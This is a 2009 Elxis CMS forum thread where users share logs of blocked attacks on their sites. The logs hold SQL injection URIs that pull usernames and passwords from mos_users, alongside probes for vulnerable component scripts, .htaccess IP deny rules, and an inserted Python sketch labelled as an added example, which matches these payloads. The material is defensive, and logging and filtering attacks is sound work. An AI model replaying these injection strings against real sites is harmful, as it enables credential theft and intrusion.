Elxis CMS Forum
Support => Security => Topic started by: jimmyz on May 18, 2009, 18:19:09
-
ATTACKER IP ADDRESS: 66.7.205.7
Requested URI: /en/components/com_artforms/assets/captcha/includes/captchatalk/swfmovie.php
Requested URI: /greek/components/com_artforms/assets/captcha/includes/captchaform/mp3captcha.php
Requested URI: /english/components/com_artforms/assets/captcha/includes/captchaform/imgcaptcha.php
Another one bites the dust. :P
-
I had the same attacks from the same ip !!
Elxis show him the exit !! ;D
-
me too.... same date
-
I visited 2 web sites today, not made with Elxis, for some reason. Really good looking sites, one of a radio station and another one of an online shop. Both were made with commercial applications (not open source). Both sites have serious security problems. Anyone can take these sites down, any time, with simple SQL injection. Even if you don't know how I can show you how and you can then do it by yourself in minutes. I wonder why people pay so much money to build sites in insecure environments and with insecure platforms. OK, I can understand that the one that paid to build his site is not a security specialist, but those that built and use the software don't see that the software is insecure? No one tests the application? No one tries strange queries? No input validation? No debug? Nothing?
I believe that 90% of the custom made dynamic web sites (php, asp, etc) can be easily hacked because they have been built by inexperienced and careless developers. The solution to this problem is to use well known open source platforms, not specifically Elxis if you don't like it, as they are updated continuously, used in thousands of web sites and have been approved secure enough. For us, Elxis is our proposal to the people if they want to have a modern, secure and flexible web site.
Note: I usually contact the owners of the sites I find to be insecure. It is a nice feeling to inform them that their lovely web site is finally not too good... :D
-
???No one tries strange queries? No input validation? No debug? ???
How can you see all that, John? Give us some tips on how we can check a site in that way... (you get us hooked and we can't enjoy what you see)
-
I like that in a pm ;D ;D ;D
-
Security is always a big concern... I 'd take the course too! ::)
Thanks to Elxis Defender, we can joke around with each other... But think of the others... :'(
-
ATTACKER IP ADDRESS: 85.240.231.83 (blocked)
Requested URI: /index.php?Itemid=union/**/select/**/SC4NN3R/*
DATE: 19-05-2009 19:55:38
Attack was logged
All the filters work!!
-
Note that on the requested URI you don't see the full attack but only the $_GET query.
Elxis Defender checks/blocks $_GET, $_POST, $_REQUEST and even $_COOKIE variables.
The Defender's logger will tell you the exact filter used to block the attack.
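
Added example, not part of the original post and not Elxis Defender's own code: a small Python sketch of the idea described above, checking every input source rather than only the URI and reporting which filter matched. The filter table, the function names and the POST parameter in the second sample request are assumptions made for illustration.

```python
import re
from urllib.parse import unquote_plus

# Hypothetical filter table; "mosConfig_" is the filter name quoted in this
# thread, "union_select" is a name chosen for this example.
FILTERS = {
    "union_select": re.compile(r"\bunion\s+(?:all\s+)?select\b"),
    "mosConfig_": re.compile(r"mosconfig_"),
}

def normalize(value: str) -> str:
    """Undo the obfuscation seen in the logged URIs before matching."""
    value = unquote_plus(value)                            # %xx and + decoding
    value = re.sub(r"/\*.*?\*/", " ", value, flags=re.S)   # /**/ used as a space
    return re.sub(r"\s+", " ", value).lower()

def inspect(request: dict) -> list:
    """Return sorted (source, filter) hits across every input source,
    checking parameter names as well as values."""
    hits = set()
    for source in ("get", "post", "cookie"):
        for key, val in request.get(source, {}).items():
            text = normalize(f"{key}={val}")
            for name, rx in FILTERS.items():
                if rx.search(text):
                    hits.add((source, name))
    return sorted(hits)

# Constructed requests. The first query value is copied from a URI logged in
# this thread; the POST body of the second is an assumption, since the log
# shows only the URI and the filter name.
SCANNER = {"uri": "/index.php", "get": {"Itemid": "union/**/select/**/SC4NN3R/*"}}
HIDDEN = {"uri": "/mod_cbsms_messages.php", "get": {},
          "post": {"mosConfig_absolute_path": "placeholder"}}
BENIGN = {"uri": "/index.php", "get": {"option": "com_content", "Itemid": "5"},
          "cookie": {"lang": "en"}}

if __name__ == "__main__":
    for req in (SCANNER, HIDDEN, BENIGN):
        print(req["uri"], inspect(req) or "clean")
```

The second request shows why a clean-looking URI can still appear in the log: the match comes from the POST data, which the Requested URI line never displays.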
-
I caught another one!
ATTACKER IP ADDRESS: 70.85.181.50
Requested URI: /mod_cbsms_messages.php
filter that worked: mosConfig_
Host name: yenko.websitewelcome.com.
Location: Dallas, TX, UNITED STATES
-
The name servers are from HostGator and The Planet data center.
-
This is a notification e-mail from Elxis Defender
Elxis Defender blocked an attack to your site
ATTACKER IP ADDRESS: 65.254.224.34
Requested URI: /com_gallery/index.php?option=com_gallery&Itemid=0&func=detail&id=-99999/**/union/**/select/**/0,0,concat(username,0x3a,password),0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,username/**/from/**/mos_users/*
DATE: 26-05-2009 14:58:05
-
I think someone is testing :) The same IP, 2 minutes before yours
ATTACKER IP ADDRESS: 65.254.224.34 (blocked)
Requested URI: /com_newsletter/index.php?option=com_newsletter&Itemid=S@BUN&listid=9999999/**/union/**/select/**/name,concat(username,0x3a,password)/**/from/**/mos_users/*
DATE: 26-05-2009 14:56:09
Attack was logged
-
Elxis Defender blocked an attack to your site
ATTACKER IP ADDRESS: 65.254.224.34
Requested URI: /com_downloads/index.php?option=com_downloads&Itemid=S@BUN&func=selectfolder&filecatid=-1/**/union/**/select/**/concat(username,0x3a,password),concat(username,0x3a,password),concat(username,0x3a,password)/**/from/**/mos_users/*
DATE: 26-05-2009 19:44:33
Attack was logged
Site turned offline for 5 seconds
Another attack for today . WHAT IS THIS IP ? WHERE IS IT ?
-
WHAT IS THIS IP ? WHERE IS IT ?
USA
MASSACHUSETTS
BURLINGTON
THE ENDURANCE INTERNATIONAL GROUP INC
Nothing to worry about, always try to notice the mos prefix... this means that it is just some script written for Mambo. Some kids are playing.
-
You can add a deny rule in your .htaccess file to block such IPs permanently.
order allow,deny
deny from 65.254.224.34
allow from all
-
I notice that all these attacks are based on our signatures in the forum. :)
-
Just for the record, the same one attacked two sites, with 1 sec difference:
ATTACKER IP ADDRESS: 65.254.224.34
Requested URI: /en/com_downloads/logos/index.php?option=com_downloads&Itemid=S@BUN&func=selectfolder&filecatid=-1/**/union/**/select/**/concat(username,0x3a,password),concat(username,0x3a,password),concat(username,0x3a,password)/**/from/**/mos_users/*
DATE: 26-05-2009 19:46:28
Elxis slapped the door on his face!
-
This is the solution, I had the same problem.
You can add a deny rule in your .htaccess file to block such IPs permanently.
order allow,deny
deny from 65.254.224.34
allow from all
-
This is the solution, I had the same problem.
The logged attack is not the problem! Think clever ;)
-
And another one:
ATTACKER IP ADDRESS: 82.192.68.25
Requested URI: /mod_cbsms_messages.php
DATE: 04-06-2009 15:56:21